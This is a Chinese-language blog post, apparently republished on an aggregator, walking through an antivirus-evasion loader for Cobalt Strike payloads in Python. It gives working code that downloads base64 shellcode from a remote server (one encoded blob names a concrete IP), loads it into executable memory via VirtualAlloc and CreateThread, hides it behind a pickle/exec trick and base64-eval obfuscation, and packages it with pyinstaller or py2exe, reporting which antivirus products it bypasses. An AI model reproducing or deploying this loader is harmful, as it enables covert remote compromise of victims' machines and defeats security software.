python免殺技術---復現+改進----1

0x01 復現

復現文章：https://mp.weixin.qq.com/s?__biz=MzI3MzUwMTQwNg==&mid=2247484733&idx=2&sn=5b8f439c2998ce089eb44541d2da7a15&chksm=eb231%E2%80%A6

首先用cobaltstruke生成一個python的payload腳本
在這里插入圖片描述
然后復制里面的payload進行Base64編碼：加密地址為：http://tool.chinaz.com/tools/base64.aspx

第二步把剛剛生成的Base64丟到服務器里面進行訪問

能看到這個就說明沒錯
然后下一步把地址復制進行反序列化(重要！！)
代碼為：

import base64
import pickleshellcode = """
import ctypes,urllib.request,codecs,base64shellcode = urllib.request.urlopen('http://IP/1.txt').read()
shellcode = base64.b64decode(shellcode)
shellcode =codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
# 設置VirtualAlloc返回類型為ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申請內存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode))
)
# 創建一個線程從shellcode防止位置首地址開始執行
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))
)
# 等待上面創建的線程運行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""class A(object):'''當定義擴展類型時（也就是使用Python的C語言API實現的類型），如果你想pickle它們，你必須告訴Python如何pickle它們。 __reduce__ 被定義之后，當對象被Pickle時就會被調用。它要么返回一個代表全局名稱的字符串，Pyhton會查找它并pickle，要么返回一個元組。這個元組包含2到5個元素，其中包括：一個可調用的對象，用于重建對象時調用；一個參數元素，供那個可調用對象使用；被傳遞給 __setstate__ 的狀態（可選）；一個產生被pickle的列表元素的迭代器（可選）；一個產生被pickle的字典元素的迭代器（可選）exec態執行python代碼。'''def __reduce__(self):return (exec, (shellcode,))ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)
#ret_decode = base64.b64decode(ret_base64)

在使用pickle.dumps(A())時，__reduce__自動被調用，會返回一個元組給dump進行反序列化，元組的第一個元素是exec，第二個元素是exec的參數，也就是shellcode，當我們重建對象時就會調用自動調用exec函數，也就是當我們序列化時。ret的內容是dump序話A（）內容
exec是動態執行python代碼，這里就是把shellcode字符串的內容當做python代碼來執行。

運行結果：
在這里插入圖片描述
我們把這串代碼復制到此腳本進行生成


import base64,pickle,ctypes,urllib.request
shellcode =b'gANjYnVpbHRpbnMKZXhlYwpxAFgvBAAACmltcG9ydCBjdHlwZXMsdXJsbGliLnJlcXVlc3QsY29kZWNzLGJhc2U2NAoKc2hlbGxjb2RlID0gdXJsbGliLnJlcXVlc3QudXJsb3BlbignaHR0cDovLzQ3LjExMC4xMzYuODIvMS50eHQnKS5yZWFkKCkKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShzaGVsbGNvZGUpCnNoZWxsY29kZSA9Y29kZWNzLmVzY2FwZV9kZWNvZGUoc2hlbGxjb2RlKVswXQpzaGVsbGNvZGUgPSBieXRlYXJyYXkoc2hlbGxjb2RlKQojIOiuvue9rlZpcnR1YWxBbGxvY+i/lOWbnuexu+Wei+S4umN0eXBlcy5jX3VpbnQ2NApjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CiMg55Sz6K+35YaF5a2YCnB0ciA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSwgY3R5cGVzLmNfaW50KDB4MzAwMCksIGN0eXBlcy5jX2ludCgweDQwKSkKCiMg5pS+5YWlc2hlbGxjb2RlCmJ1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KAogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgYnVmLCAKICAgIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSkKKQojIOWIm+W7uuS4gOS4que6v+eoi+S7jnNoZWxsY29kZemYsuatouS9jee9rummluWcsOWdgOW8gOWni+aJp+ihjApoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMuY19pbnQoMCksIAogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgY3R5cGVzLmNfaW50KDApLCAKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpCikKIyDnrYnlvoXkuIrpnaLliJvlu7rnmoTnur/nqIvov5DooYzlrowKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkpcQGFcQJScQMu'
pickle.loads(base64.b64decode(shellcode))

然后點擊運行你會發現在cs里面成功上線了一臺機器
在這里插入圖片描述
最后們利用pyinstaller這個腳本進行打包成exe

pyinstaller -F test2.py --noconsole -i icon.ico

生成完畢的exe在dist目錄下
最后我們在測試一下能不能運行，可以上線
在這里插入圖片描述
查殺：
360殺毒直接查殺，可以直接過火絨：

在這里插入圖片描述

0x02 改進

方法1 使用py2exe打包

首先安裝py2exe文件，在相同目錄下新建文件setup.py，里面內容為：

from distutils.core import setup
import py2exesetup(console=['test2.py'])

然后運行：

python setup.py py2exe

將會生成exe文件，在dist目錄下，可以過火絨和360殺毒在這里插入圖片描述

在這里插入圖片描述
但是進行云查殺時，被查殺出來了

方法2 混淆語句

繼續干，試試混淆語句
我們將下面這句話用base64加密，然后用eval執行

pickle.loads(base64.b64decode(buf))

結果為：

cGlja2xlLmxvYWRzKGJhc2U2NC5iNjRkZWNvZGUoYnVmKSk=

程序：

在這里插入圖片描述
修改程序為，這里把原來buf也放在了服務器上了：

import base64,pickle,ctypes,urllib.requestbuf = urllib.request.urlopen('http://IP/2.txt').read()
#print(buf)
string = "cGlja2xlLmxvYWRzKGJhc2U2NC5iNjRkZWNvZGUoYnVmKSk="
exec(base64.b64decode(string))

使用pyinstaller打包
在這里插入圖片描述

在這里插入圖片描述
但是360殺毒查殺出來了，wc，搞個免殺太難了。

使用py2exe打包，360都沒有檢測出來

啊啊啊啊！終于成功了

0x03 總結

這遍文章重點關注打包，序列化和反序列話，載荷分離是如何做到的，希望一個星期內，自己寫一個加載器免殺的文章。

還有很多細節問題沒吸收，明天再看一遍。

最后：欣醬NB！！！！

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/379874.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/379874.shtml
英文地址，請注明出處：http://en.pswp.cn/news/379874.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！